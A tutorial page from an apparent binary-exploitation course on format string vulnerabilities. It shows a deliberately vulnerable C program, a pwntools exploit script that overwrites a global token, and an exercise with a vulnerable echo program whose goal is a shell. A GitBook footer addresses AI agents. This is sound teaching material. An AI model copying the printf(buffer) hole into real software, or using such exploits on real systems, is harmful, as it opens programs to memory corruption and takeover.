> For the complete documentation index, see [llms.txt](https://hexinuni.gitbook.io/readme/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hexinuni.gitbook.io/readme/binary-exploitation/linux-kernel-exploitation/11.-format-string-vulnerabilties.md). # 11. Format String Vulnerabilties ### Format String Vulnerabilties Yes, I know this is a really cliche topic but I am just covering one cool thing that you can do with pwntools. That's all, I promise. Now, we will be looking at this simple program that is vulnerable to a format string attack. The idea is to modify the token so that it contains 0xcafebabe when the check occurs. ``` #include #include unsigned int token = 0xdeadbeef; int main() { char buffer[200]; scanf("%199s", buffer); printf(buffer); printf("\nToken = 0x%x\n", token); if (token == 0xcafebabe) { puts("Winner!"); } else { puts("Loser!"); } } ``` So after playing around with the program, we figure out that the first format argument we control is at offset 5. ``` ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ ../build/2_overwrite AAAA%5$x AAAA41414141 Token = 0xdeadbeef Loser! ``` Next, we need the address of the token. ``` ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ nm ../build/2_overwrite | grep token 0804a028 D token ``` Now we can write our exploit script. Pwntools actually has a format string attack generator so we can beat the binary in a few quick easy lines. ``` #!/usr/bin/python from pwn import * token_addr = 0x0804a028 def main(): p = process("../build/2_overwrite") payload = fmtstr_payload(5, {token_addr: 0xcafebabe}) log.info("Sending payload: %s" % payload) p.sendline(payload) data = p.recvall() realdata = data[data.find("Token"):] log.success(realdata) if __name__ == "__main__": main() ``` Running the program. ``` ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ python 1_overwrite_token.py [+] Starting local process '../build/2_overwrite': Done [*] Sending payload: (�)�*�+�%174c%5$hhn%252c%6$hhn%68c%7$hhn%204c%8$hhn [▁] Receiving all data: 0B [+] Receiving all data: Done (742B) [+] Token = 0xcafebabe Winner! ``` ### Exercises #### Ex 13.1: Echoes Before you continue onto the more advanced exercises, here's something to tackle. The source code to this challenge is given: ``` #include #include #include int main() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); char echoed[1000] = {0}; char number[200]; int times; int i; while (1) { read(0, echoed, 999); puts("How many times do you want it echoed?"); scanf("%199s", number); times = atoi(number); for (i = 0; i < times; i++) { printf(echoed); } } } ``` The binary to the exercise can be found here. The remote target is `nc localhost 1903` and the goal is to get a shell. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hexinuni.gitbook.io/readme/binary-exploitation/linux-kernel-exploitation/11.-format-string-vulnerabilties.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.